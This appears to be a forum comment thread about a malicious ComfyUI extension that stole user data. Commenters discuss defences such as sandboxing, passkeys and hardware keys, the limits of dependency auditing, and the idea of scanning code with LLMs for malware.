Lesson for the people who run and execute stuff without looking at the code first.
Is there no way to defend against a keylogger? What can you do if a simple keylogger can steal your passwords?
Aside from not using passwords or using 2FA, sandboxing helps.
A VM with GPU passthrough set up would be one example (although this is usually a pain to set up and I expect most people aren't doing it).
As a more user-friendly example, if you install an iOS app (local-model LLM and image generation apps exist), the sandboxing provided by the OS ought to be more than enough to prevent keyloggers, short of 0day exploits.
Not as secure as VMs but GPU passthrough with Docker/Podman is much easier to set up, and you can even use the GPU on the host machine at the same time.
Are you giving it access to /dev/dri, or doing some fancier sandboxing?
(Would you even need anything fancier? I think /dev/dri is supposed to isolate users.)
Nvidia provides a toolkit to do this [1], getting a GPU into a container is as easy as running `podman run --device nvidia.com/gpu=all`. The process is similar for Docker, but rootless Docker requires some extra steps IIRC.
[1] https://docs.nvidia.com/datacenter/cloud-native/container-to...
Ideally, don't use passwords: Passkeys where supported, SSH Keys, client certificates, social login via a service that does support one of these methods.
Magic link emails can also work, but are potentially vulnerable if you copy/pasted it rather than clicking depending on the keylogger's capability and clipboard visibility, although the window for attack is small, it's a much more sophisticated attack that leaves more traces (good sites will reject reuse).
Second best, also use a second factor: U2F ideally, TOTP with the same caveats as magic link emails, and at the bottom of the barrel SMS which is better than nothing but known to be very flawed.
Honestly, if you are anything other than a casual user, and don't have devices with support baked in already, it's crazy not to spend ~£60 on a pair of security keys for passkey/U2F. It's not a lot of money and is just so much more secure.
Ideally, don't use passwords: Passkeys where supported, SSH Keys, client certificates, social login via a service that does support one of these methods.
If a process has the privileges to run as a keylogger, it can also grab your local SSH private keys and possibly harvest passwords and passkeys from your local password manager vault [1]. The process has local access and since it is a key logger presumably your master password. (The complexity depends a bit on the password manager, e.g. IIRC macOS keychain always requires a roundtrip through the secure enclave).
Honestly, if you are anything other than a casual user, and don't have devices with support baked in already, it's crazy not to spend ~£60 on a pair of security keys for passkey/U2F. It's not a lot of money and is just so much more secure.
100% this. A secure enclave or a hardware key is the only way to keep your key material safe.
Also, app sandboxing should be the default. macOS App Store Apps are sandboxed. Unfortunately, these days the standard is still for applications to have unfettered access to a user's files.
[1] Passkeys can also be on a security key, but e.g. Yubikeys only have a small number of resident key slots and I think passkeys to most people means key material synced through iCloud/1Password/your favorite cloud.
When I talk Passkeys, I definitely mean hardware by default, which is how most websites position it: it's normally described as "set up a passkey for this device" and in practice the vast majority of people using them will be using a fingerprint reader in a laptop or on their phone, because most people don't set up password managers with passkeys.
To me, using a software for passkeys is a hack only power users will do, and yes, I see it as a bad idea.
Right now I believe Yubikeys can do 25 passkeys, which is a pretty low limit, but it offers enough to protect your most important accounts, and right now I doubt many people have more than 25 sites they use that support passkeys (of course, hopefully that goes up quickly).
"keylogger" may not be the right term here? I'm not familiar with how that term is broadly used for, but my definition of that term is a tool that logs your keypresses. Here, it seems like it was scraping your chrome/firefox data for login cookies?
Honestly there's quite a lot of malware that go against those files, I wonder if there's a way to require high privilege to accessing chrome/firefox appdata, or just block it entirely from other apps.
Yeah you're right, people miss use the term keylogger frequently. These kind of malware are broadly called "stealers" and usually do not involve keylogging.
Actual keyloggers tend to be rare nowadays due to them being easier to detect and the fact that in general the browser data is a more valuable target.
I mean, anything with root access can very easily use libevdev to get all keystrokes as well as mouse positions. (It's maybe 10 lines of code to do that).
So, don't run stuff as root. If it needs root access, run it in a virtual machine (personally I use qubes os for this).
Use 2FA I'd imagine.
Some entity called Nullbulge Group claims they took over the repo.
Today's capture (before the repo got 404'd) has their belligerence spiel. https://web.archive.org/web/20240609135118/https://github.co...
This is the capture from 3 days prior: https://web.archive.org/web/20240525021402/https://github.co...
I have not seen a statement from Nullbulge so it's not appropriate to say that they took over the repo.
The author of the repo is claiming that their repo is hacked, but this is an obvious lie, because their very first GitHub commit is the one where they push the malware. Nobody would hack an empty GitHub account.
I don't know if the author of the repo is lying when they say that Nullbulge is behind the attack (perhaps the author is part of Nullbulge, perhaps not).
I wouldn't be so sure no one would hack an idle account. I had my Spotify account taken before I even used it. I think in my case they used my account to pump up other lesser known artists.
There was also an actively exploited XSS vulnerability on Github in the recent days.
Doesn't mean that this guy was not a malicious actor, only that one shouldn't be so quick to cast stones without evidence.
The person who created the custom node is the same person who "hacked" it. Whether or not the account is technically owned by some unrelated civilian is not important, because there is no other activity on the account.
Okay, sure. But if we have an account which has never had any legitimate activity on it ever - an account that has only ever been used to push malware - then I don't know if it matters much who is the "rightful owner" of the account. Things would be different if the GitHub account had some legitimate activity before the "hack".
I agree it doesn't matter much. Could be a noob mistake by the account owner and this is damage control.
Must be script kiddies. You have the opportunity to deploy anything to a machine that almost certainly has a powerful GPU, and choose a key logger that exists in signature databases? Genius.
Quick search reveals anti-AI motivated script kiddies. Also some degen NSFW "art" content on DeviantArt and Reddit by the same name, their likely origin.
Telegram and discord webhooks are 100% signs of an unsophisticated attacker and they are a very common sight in malware samples. Github is full of skiddie "info stealer" projects that use telegram api / discord webhook to deliver the stolen data. They make no sense to use since anybody can spam that webhook endpoint. Not 100% sure about discord, but at least in the case of telegram anybody can even read and download all the data that has been sent to it.
Something is fishy here.
According to the original report, the “key logger” was in the custom wheels in the requirements.txt, but looking at that repository there has been only two commits, which according to Reddit both had malicious code in them.
Of course, proper discovery would be easier if the GitHub account still existed.
How do people feel about using docker to prevent this sort of thing? Does it strike the right balance between usability and security?
Well, Docker is great for this as long as you're not one of the unlucky few whose machine is bricked because of Docker. So, mostly yes, I suppose.
What does that even mean?
"Bricking" is when your electronic device stops working, i.e. becomes a brick. Docker is known to occasionally brick Windows machines.
Wait… what!?
This is the first I’m hearing of this. Do you have any references?
You can find many references by googling some variations of keywords Docker, Windows, brick
Googled that, thanks for not providing clear references to your claims, and found that docker can crash Windows on boot, but not "brick" it. People are still able to safe boot, run system recovery/restore, or even reinstall Windows if they choose.
Besides, bricking software is impossible, bricking refers to physical devices unable to bootstrap anymore.
Not exactly. Hard brick is what you are referring to where you need to repair/reset the hardware OEM after corruption.
A soft brick is the actual reference here where you can easily recover from software/re-install.
Docker itself doesn't seem to have the best quality control for their official releases, so blindly upgrading Docker will likely bite you in the ass if you do it for a few years. :(
doesn't docker have this weird property where it bypasses your firewall?
https://www.techrepublic.com/article/how-to-fix-the-docker-a...
What about second firewalls ?
Hobbit jokes aside, yes, it pokes holes in the firewall on the machine hosting docker. It generally creates a lot of firewall rules to isolate or permit traffic to/from containers and expose ports.
Your "safest" bet is probably to only expose docker containers on the localhost interface, and use a reverse proxy (Nginx/Traefik/etc) to expose services. At least that's how i did it when i last ran Docker a few years ago.
what can be done to stop all this? We need some sort of OS level layer to validate these things. If we put a local LLM which checks the bytecode of things which are getting installed/running for security = will that solve all this? My heart goes out to those who must have lost their money due to this.
One basic measure (one part of a solution) would be to split Comfy into two parts: the part that does all the work (running plugins, generating images) should have access to nothing but read-only access to the files it needs, the GPU, and a socket to communicate with the other part.
A cleaner API you mean which exposes what is necessary only.
I meant sandbox the less trusted bit.
Well, for one, the keylogger is detected by antivirus programs.
I keep coming across various projects whose executables trigger antivirus programs, and I think that when those triggers happen, "it's fine, don't worry" claims need to be treated with more skepticism.
At the same time, antivirus vendors need to stop being so lazy and using strings and such that are clearly part of an open source program/library for their signatures.
I believe there should be a clear indicator in UI of every OS when any new program listens to your keystrokes.. it should be the norm
If you compile a benign binary yourself which has no malware, Chrome and Windows Defender will flag it as suspicious.
I was hacking on some open source stuff targeting win32, I posted some binaries on GitHub releases, I try to share with others... People tell me it's flagged as malware. It isn't malware. What do I tell them?
I hear code signing helps the heuristics to not get it flagged, but doesn't remove it.
If people working on said software want the warnings to be taken seriously, they should work on reducing false positives.
I think this is one of the use cases for a sandboxed WASM plugin system.
But almost everyone working on these plugins really wants to use Python and PyTorch.
nobody ported python to wasm yet?
Why does there seem to be such a disregard for security in deep learning?
There's examples like this post, but also, until recently, almost every deep learning model was literally distributed as a pickle file.
It's not specific to deep learning, practically every industry will look at security as a cost just not worth it. When we start throwing the CEO into jail instead of making them pay a 18.5M fine for losing the data of 41 million customers that's when things will change. Until then, it's just the cost of doing business.
Really? Throw a CEO in jail? This is just as crazy as the whole throw the supervisor in jail if the worker dies mantra in construction.
#1 users are responsible to look after their privacy. If you are using applications that don’t allow this - you need to reject the use of those applications.
#2 this needs to start happening in mass numbers. People need to rise up against these crazy corporate tech companies and their bull
I would love to live in a world where everyone did that. But that's (currently) a utopian pipe dream.
I don't know if throwing CEOs in jail is the answer, but neither is putting all the responsibility on people to make tough choices like "give up my privacy or fall out of touch with my friends" or "give up my privacy or give up the chance to get this job".
Well, we are currently at the "we tried nothing and we are out of ideas" stage so something needs to change.
From my outsider perspective, it's a field that moves very fast, there seem to be new tools being released every week so:
1) As the developer if you focus on hardening, you might be too late to release.
2) People downloading shiny new libs/files/programs constantly.
3) Influx of people not that versed in the basics of computer security playing around with local LLM models, image generators, etc.
That seems like an almost exact duplicate of the NodeJS/NPM issues?
Those same points (but the NodeJS/NPM version of them) is a lot of why that ecosystem is having security and reputation issues as well.
"Security is not my field, I'm a stats guy": a qualitative root cause analysis of barriers to adversarial machine learning defenses in industry [0]
Isn’t this just one of the milestones that’ll eventually happen? Blind panic due to security always occurs at some point. There must be a ‘law’ defined for this somewhere.
I'm curious if it'd be possible to use a Code LLM to scan GitHub repos and detect possible malware hiding in source code.
I have a feeling that we'll be seeing some businesses, built, around exactly that.
Github? ;)
Socket.dev is not built around this but makes use of this.
I'm afraid a few simple tweaks, especially if the hackers themselves have access to the code LLM to try out their code, will be sufficient to evade detection.
Endless race like with Anti-Virus software.
If such a tool became commonplace, bad actors would just run it on their own malware and keep tweaking it until the LLM failed to detect it.
Looks like a pretty small project. Only had 40 stars on GitHub before the repo was removed.
Was this the main method of GPT4 and Claude integrations for ComfyUI?
It was an extension for ComfyUI, which has 37k stars on GitHub. The way ComfyUI is commonly used is that a person shares a "workflow" file, which utilizes various obscure extensions (called "custom nodes") and then the people who want to run the workflow on their own computer will install all these obscure custom nodes that have like 40 stars on GitHub or so.
Just like an npm install
Using stars as popularity doesn't work.
I have personally never starred anything that I use. And 90% of the open source that I use isn't on github.
Not surprised at all, ComfyUI extensions are just arbitrary python code. The first time I tried ComfyUI extensions I put it in a podman container with GPU passthrough and blocked network access.
Hopefully this will be just the incentive they need to do something safer. Something similar happened before the move from PKL to SAFETENSOR for model files.
Comfy UI manager recently added some security levels so that by default you can't accidentally leave a public instance that allows remotely installing arbitrary python code https://github.com/ltdrdata/ComfyUI-Manager?tab=readme-ov-fi...
I peered down the ComfyUI rabbit hole [1] and it is shockingly powerful. Did Adobe drop the ball on image generation? What are they doing over there? There has to be a better, more secure way to bundle up all this imagegen logic.
[1] https://learn.thinkdiffusion.com/bria-ai-for-background-remo...
Adobe makes practical pipelines for creatives, not prototyping tools. ComfyUI is mostly for prototyping and ML nerds (I don't mean this in a bad way). There are more practical interfaces to get things done built on top of it, such as Krita Diffusion [1] and many others.
Yep, it's super powerful.
I would say that the "more secure way" is to just use ComfyUI without installing any obscure nodes from unknown developers. You can do pretty much anything using just the default nodes and the big node packs.
That discussion on reddit really is something else so much misinformation and pretend knowledge at work. It's as scary as the malware.
And this is the input for AI training.....
Not just any input, but paid input :-)
The user's reddit profile: https://archive.is/G5GIW
They have a couple of other tools hosted on HuggingFace, both having the malicious dependencies and both requiring entering API keys, namely:
"SillyTavern Character Generator": https://archive.is/gETq3 (requirements.txt: https://archive.is/xqqtA)
"Image Description with Claude Models and GPT-4 Vision": https://archive.is/6Ydgs (requirements.txt: https://archive.is/9Sp5C)
They've also posted some BeamNG mods, and were casting doubt on accusations that some other account's mod contained malware: https://archive.is/zLiaZ
That other account's reddit profile: https://archive.is/r9V1M
No domain and website registered?
Which is everybody in the world except for a handful of people.
Not really, and it takes a few minutes because most of these packages (including npm) are small. You don’t have to read the WireGuard codebase because it’s reputable enough, but for obscure or unknown add-ons/package code, it’s on you to double-check, just like reading the ‘readme’.
I haven’t looked at the source code of a single npm package I’ve installed in the past 5 years.
“It takes a few minutes”
Dude my web dev projects have like 1,000s of dependencies. I’m not going to check the source code of every package tailwind requires.
Even if you did review it, a motivated attacker is not going to have an exfiltrate_user_data(). The xz backdoor exploit was incredibly sophisticated, and one key of the design was sneaking a "." into a single line of a build test script.
A cursory audit of primary dependencies has almost zero chance of catching anything but a brazen exploit.
Yeah. Realistically I think the best course of action is just assume you’re already using a library that can exfiltrate data.
This requires allowlisting egress traffic and possibly even architecting things to prevent any one library from seeing too many things. This approach can be a big pain though and could be difficult to implement practically.
So just sneak the code in a dependency of a dependency.
Who’s diving 3-4 layers deep into dependencies?
No need to hide it inside dependencies, just modify the code before building and pushing the package to PyPi.
Imo this makes no sense. There's zero chance you will start inspecting all dependencies even in a relatively small application, which now a days could pull already a large number of deps.
I don't see how doing any of this manually will help.
Would you have caught the XZ backdoor?
You can't "not really" this away. Most people don't bother looking at small package code, much less code for packages that are far more complex.
This is why I refuse to use almost anything on npm. If you have a zero dependency project I'll consider it. If you have a dependency that also has a set of dependencies then I will never use your code.
Most people should only download software from people they trust (to not be evil and also to be competent).
If you download code off some unknown person's GitHub repo, you'd be stupid not to read it very very carefully!
Ain't nobody got time for that. LLMs should be capable of analysing code for anything malicious / suspicious.
Unfortunately, no, because the existence of LLMs that can automatically determine code that is suspicious will be offset by the existence of LLMs that can generate malicious code that bypasses the detection abilities of the aforementioned LLMs.
Generative Adversarial LLMs, let’s go!
Perhaps we could just call these ALLMs (Adversarial Large Language Models). You’re already dropping the N in GAN, I see no need for the G.
As an end result I think someone clever could make a LLaMA pun for the name of a LLaMA based ALLM.
Since LLM and keyloggers are turing machines, it won't happen. (Or more precisely: it won't beat the cat and mouse game of obfuscations.)
No, they cannot work with large code base, not yet. And have very limited talent for logic and debugging. They may improve at some point, probably will be hooked up with external tools.
Everyone runs code they have not inspected. For example, almost no one has read all of the code of in FreeBSD, Linux (kernel), MacOS, Open BSD, or Windows. I also doubt people are reading all of the code in their favorite Linux distribution.
Even inspecting the code is not enough because a lot of security vulnerabilities are not obvious. Basically, security is hard, and often there are not a lot of good solutions.
Here are some tricks I have found which have helped me minimize my risk:
1) Use different machines for different purposes. Basically, you should not use 1 PC (or Mac) for everything. I have one for my finances, one for gaming, and a general-purpose PC. If one gets hacked, the others are still fine.
2) Get software from trustworthy sources. Most of the major software companies are not going to ship malicious code. For open-source software, use software from popular projects which have a good reputation.
3) Ask yourself why is someone providing this software? Is it for money? Are they creating it because they enjoy it? How do they support themselves? For example, Google's business model is building a dossier on people so it can deliver ads they are more likely to click on. When Google gives you something for "free", they will probably use it to track you, or track visitors to your website.
4) Support the people who build the software you use. If its commercial software, pay for it, do not pirate it. If it's open source, donate time or money to the projects you use. Also, thank the people who work on the software, and ALWAYS treat them with respect.
5) Avoid pirated software, software from "free" porn web sites, etc. People who provide illegal software, or sketchy software are probably willing to put back doors in it.
On this topic, how much should a person trust central repositories of well-known operating system distributions (e.g. Arch, Debian)? I know only trusted people can upload to them, and the only time I've ever heard of malware slipping past them was XZ, but I don't know how much care they take.